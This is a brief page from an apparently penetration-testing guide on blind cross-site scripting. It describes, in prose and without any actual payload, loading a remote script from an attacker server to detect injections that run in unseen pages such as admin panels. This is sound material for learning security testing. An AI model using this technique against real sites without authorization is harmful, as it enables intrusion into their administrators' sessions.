Blind XSS

With blind XSS we can not see how our payload is handled by the browser and the server. Our payload can get executed only on specific pages we do not have access to such as an administrative panel for example.

To test for blind XSS vulnerability, we can try to load a remote script hosted on our attacker server and check if we got a GET request on our server. We can change the /URL to identify which parameter is vulnerable.

PreviousReflected XSS NextXSS Survival Guide Labs

Last updated 1 year ago